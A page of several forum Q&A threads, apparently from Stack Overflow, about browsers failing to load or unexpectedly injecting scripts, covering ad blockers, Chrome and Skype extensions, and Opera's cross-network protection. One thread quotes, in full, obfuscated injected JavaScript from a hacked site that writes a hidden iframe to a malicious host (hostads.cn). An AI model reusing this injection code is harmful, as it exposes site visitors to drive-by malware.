This ain't no spam, the actual website I'm working on (sorry, it's in Latvian).
The problem here is that there is a tracking script provided by AdForm, which Chrome does not want to load. Firefox loads it smoothly. Have not checked with other browsers though.
Since the script is external, I cannot think of a way to debug it.
Has anyone experienced such a problem with Chrome and how do I fix this?
The script is right before the closing <head> tag.
Update
As Blender has suggested, I've tried removing the async parameter before, but to no avail.
You most likely have the AdBlock extension (or some similar one) installed. If I disable AdBlock the script loads just fine in Google Chrome. With it activated, the script gets blocked.
Update
The AdBlock extension (both the Google Chrome and Firefox versions) uses EasyList, which is a list of adserver domains. Any files loaded from these domains are getting blocked by the extension, and adform.net, the domain your external JS file resides on is on the list (do a CTRL+F for it).
Related
I have created a chrome extension which is quite big. It relies on external frameworks as well as custom code. The extension manipulates the DOM and my fear is that it would really slow chrome down for some users especially if it is loaded on every tab.
Questions
Are chrome extensions loaded per tab?
Is there an upper or suggested limit to how big your extension should be?
Extensions downloaded by the Chrome browser upon install are subsequently run off of the local disk in order to speed up performance. If a new version of the extension is pushed online, it will be automatically downloaded in the background to any users who have the extension installed.
Answer to the second one I don`t think so.
I can only answer the first question:
chrome extension code might be injected to web page using content script, you need to specify which host you want to inject script to.
So it is not a question of will chrome extension be loaded per tab, you need to specify whether you want your extension to load per tab.
You can request the extension to load only in the web sites that you want it to load.
see content script here
I work on a web site, using jQuery-1.8 , and found out, a certain extension ( on the CEO-s laptop ) is using jQuery-1.7 as a content script. This content script overwrites my script. Is there a way I can block at least some certain extensions from loading on the chrome tab my web app is using? A meta tag maybe?
No. Unless the said extension is cooperative (that is it looks for the meta tag, or a specific URL, to disconnect itself), you have no way of disabling it.
You might find a way dependent on the extension but you'd need the extension's code to look for it.
In your specific case the problem seems to be that jQuery is overwritten. Can't you simply wrap your code in order to use the specific jQuery you need ?
(function($) {
// here $ is protected :
// it has the value it had when the page was loaded
})($);
This behavior by an extension is not really acceptable, you should contact the extension developers to get it fixed. If they can't be reached, then you should request removal from the Chrome Web Store.
It seems that my website has been hacked, or an exploit was found or something so now everytime I load certain pages the following javascript and iframe get injected:
<script language="JavaScript" type="text/javascript">
B76197C940748B="pars";B76197C940748B+="eIn";B76197C940748B+="t";DCEC79103="St";DCEC79103+="ring.";DCEC79103+="fr";DCEC79103+="omC";DCEC79103+="harCo";DCEC79103+="de";function E0D7700E45C574E(A911795){var B3593798FBC66C=370;B3593798FBC66C=B3593798FBC66C-354;D086A805=eval(B76197C940748B+"(A911795,B3593798FBC66C)");return(D086A805);}function A41D3C153B9E8(E02A0){var D49C4143=940;D49C4143=D49C4143-938;var FB8E017784670AD="";for(E1709AB22C52CD=0;E1709AB22C52CD<E02A0.length;E1709AB22C52CD+=D49C4143){FB8E017784670AD+=( eval(DCEC79103+"(E0D7700E45C574E(E02A0.substr(E1709AB22C52CD,D49C4143)))"));}eval(FB8E017784670AD);}A41D3C153B9E8("69662028646F63756D656E742E636F6F6B69652E73656172636828227574626F3D382229203D3D202D3129207B0A7463707A3D646F63756D656E742E676574456C656D656E7442794964282771757A676327293B6966287463707A3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71757A6763207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227574626F3D383B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>
<iframe id="quzgc" src="http://hostads.cn" style="display:none"></iframe>
I've updated all my passwords (of my control panel, database, ftp,... everything) and removed the malicious code on all of my pages, php files, javascript files etc... I also fixed the permissions of all my files and folders to 755. (The infected pages were set to 777).
The problem seems resolved in Internet Explorer, Firefox, Opera and Safari. Everything works fine there, and no malicious code is inserted anymore. However, when I surf to my website with Google Chrome, I get the famous "Warning: Malware detected" page telling me google has found content of "hostads.cn", a know malicious website. Then, when I look into the source code I can indeed see that certain piece of javascript and iframe in my code.
I tried debugging my website, going over the code step by step to check where or what might be injecting the code, but I really can't find anything. And all the other browsers don't seem to suffer from it either.
Another oddity: When I "let" my pages get infected: i.e: I ignore the warning from Chrome and continue to the webpage I can indeed see the malicious code in my source. But when I download that certain page with FTP, everything looks perfectly fine...
So why is this malicious code inserted in Google Chrome alone, but not in a persistent way? And more importantly: What can I do against it?
Thanks.
Google works off a blacklist. You need to let Google know via Google Webmasters Tools that you have fixed it. I think you have removed the offending code from the site but you are still on the blacklist.
Site Health
https://support.google.com/webmasters/bin/answer.py?hl=en&answer=1624972
Request a malware review
https://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328&ctx=cb&src=cb&cbid=15vfwobwt144o&cbrank=1
I found the some strange <script/> tags on a site:
<script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/document_iterator.js"></script>
<script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/find_proxy.js"></script>
...
I haven't been able to find much information on this, but I highly doubt this is actually related to Google Chrome since this site in particular is still using <table>s for layout, and the source in question was retrieved with curl not a graphical web browser.
So,
What on earth is this?
What is chrome-extension://
Why is it using lifbcibllhkdhoafpjfnlhfpfgnpldfl as a directory name
Why is it pretending to be valid URL to a javascript file?
Why would I need find_proxy or document_iterator
Solved. As far as I know...
chrixian was right, It seems that only on this and a few select other pages, someone had re-saved them from Chrome's source-view with the Skype extension installed.
Thanks everyone for all your help, +1's for all! enjoy!
That is actually Skype Click to Call chrome extension.
Manage and view it using this link
chrome://extensions/?id=lifbcibllhkdhoafpjfnlhfpfgnpldfl
If you are using cURL to get the page, you're getting the HTML as it exists on the server--so I think a safe assumption would be: the author of the page initially saved the page from Chrome, he had an extension installed that inserted these script tages and lastly he didn't remove the script tags for one reason or another before putting the page on the server.
This is added by chrome as the page loads, to inject the extension's Javascript code into the page, so it can access the HTML document.
The Skype extension causes it by inserting all kinds of junk in webpages that you visit.
Do you have the Skype browser extension installed for Chrome?
Just disable the extension.
Chrome, like Firefox, provides developers with an easy API to extend the functionality of the web browser without needing to actually download and build the browser to do so.
They also provide a robust delivery system. In Google's case, it's the Google Chrome Web Store.
Extensions are installed locally on your computer, and use long strings as directory names to reduce the risk of collisions with another extension. In other words, if you and I both named our extensions "mycoolextension", then there would be a problem if a person tried to install your extension and my extension. The long string helps prevent collisions such as this.
The chrome-extension:// protocol is used by the browser to make requests to these local resources. Chrome extensions are developed using HTML5, JavaScript, and CSS, along with an API exposed to allow the local JavaScript to perform actions it would not normally be able to do on the Internet.
When you see these in the Chrome developer tools, it's just the extension doing it's thing, whatever that may be.
If you're seeing these, then you likely installed some extensions from the Chrome Web Store. To view them, go to the Tools menu and select "Extensions". This will show you a list of all installed Chrome extensions and apps.
To learn more about extension development, see the Getting Started Tutorial.
Also, as someone else mentioned, you're using the Skype Call Extension. However, an app using that directory name doesn't appear in the first page of the search results. It might be worth doing some more research to make sure you got that extension from a legitimate source, whether that be Skype or the Chrome Web Store.
If you're seeing it in Chrome developer tools for every request you make, it means it has access to all your websites, which could be benign, like if they're just making phone numbers clickable, or it could be malicious, if it's scraping your bank account info and shipping it off to some third party server. :)
It's a Chrome extension, and chrome-extension:// is a URL for extensions to address their contents via Javascript.
lifbcibllhkdhoafpjfnlhfpfgnpldfl is the unique identifier for the extension. I can't find it with a search, but apparently it might be Skype.
It's not pretending... it is a valid URL. The Javascript file is located in the extension. If you were to look on your harddrive you'd probably find that very file in the extensions folder.
The functions its calling probably are some sort of detection used by the extension to see if it needs to enable itself.
See this for some additional information:
Checking if user has a certain extension installed
I have a page that calls a script in the header, like so:
<script type="text/javascript" src="http://www.discoverfire.net/analytics/l/a.js"></script>
(Note you will NOT be able to load this script as it is DNSd locally as a staging domain)
Very Simple.
Firefox, IE, Chrome all have no problem with this basic, square-one feature.
Opera, however, refuses to load the script. Any variables or functions in it are "undefined" and in dragonfly, the script tag is shown in the DOM, but the "Script" tab says "No script files found."
I go to google and find random pages, their external .js files seem to work just fine.
Any idea why Opera hates me? Is there a security/javascript thing I am missing?
A few things that may be relevant, but really should make no difference:
The script is on a different domain than the page.
The script is only available on my local network. The domain is DNS'd locally for staging, from outside the network it points somewhere else. Does Opera have a setting to secretly use an external DNS server?
The script works on every other browser I have.
The problem isn't in the script content. I've reduced it to a single line with an alert and it simply won't work in Opera.
Update:
OK, the problem seems to be how Opera treats the domain.
I have moved the script to several other domains, and it DOES work just fine. I've moved it to several paths on the locally DNS'd domain, and it won't work from anywhere on that domain.
This leads me to believe that the problem is that Opera can't, or won't, load the script from this domain for some reason.
Strangely, there seems to be no problem loading pages and other resources from the domain, the problem lies in .js files only.
The domain is registered, but parked. We DNS'd it locally so we can use it for staging/testing, and that may be messing with Opera somehow with JS security.
I could be wrong though - I really have no idea. If anyone else has one, I'd love to hear it.
Update 2:
Regarding Dragonfly and the error console/developer tools, they don't say anything about the script at all. There are plenty of Undefined Variable errors for variables and functions that should be present from the script, but other than that, no errors. Oddly, the script tag does show up in the DOMM, but if I click on the Scripts tab, it says "No Scripts Found".
Update 3:
There is no blocked content, so we can at least rule out that setting.
You may want to see if its ad blocker is getting in the way. Your URL contains the text "analytics," which may be part of a "block this" pattern. I know some block Google analytics through Opera. An easy test for this may be to try moving your .js to a different path on the host.
Have you checked Opera's error console? Tools > Advanced > Error Console
It should provide information on why it won't load or if there another error of some kind.
Like Jacob suggested, you should check if it isn't blocked. To do this:
Right-click on your page
Select "Block Content..." in the context menu
At the top of the screen, click the "Details..." button
You should see the URL's that are blocked on the current page
You should ask in the Opera Forums. I had some problems with Opera in the past and they answered quickly.
Is the host serving the correct mime type of the JavaScript file. It's not a commonly known fact but the type=text/javascript attribute is actually ignored by browsers as it trusts that the server is specifying the correct type.
Additionally the mime type of text/javascript is actually wrong when it comes to JavaScript, the actual JavaScript mime type is application/ecmascript (if I recall correctly, it may be application/javascript though). If you don't believe me you should have a look here where I had more information and linked off to the Douglas Crockfords videos where he discussed the mime type.
I had something similar recently - opera would just not run a script on an external server... nor if I downloaded it and had it on localhost. It only ran when copy/pasted between script tags into the html page.
It turned out that the script was encoded with UTF-16 and that was somehow confusing the browser. When I converted it to UTF-8, everything ran fine.
So, just in case and if you still have that problem, check out the encoding settings...
I had the exact same issue, tying to load a script from a localhost/development server into a page, hosted on the public server at no avail. The only way I managed the script to load in Opera was to save a copy of the page into a location on the same development server and use the tag to refer to the original domain to get the page's .css and .js linked files. That worked. Looks like Opera doesn't like to mix public and localhost domains, but handles localhost without complaints.
what you're seeing is probably Opera's security precaution against the so-called "phish pharm" attacks: cross-network protection. You can not mix content from a public server and content from a local server.
Have a look at my answer here for a workaround:
Opera won't load some JavaScript files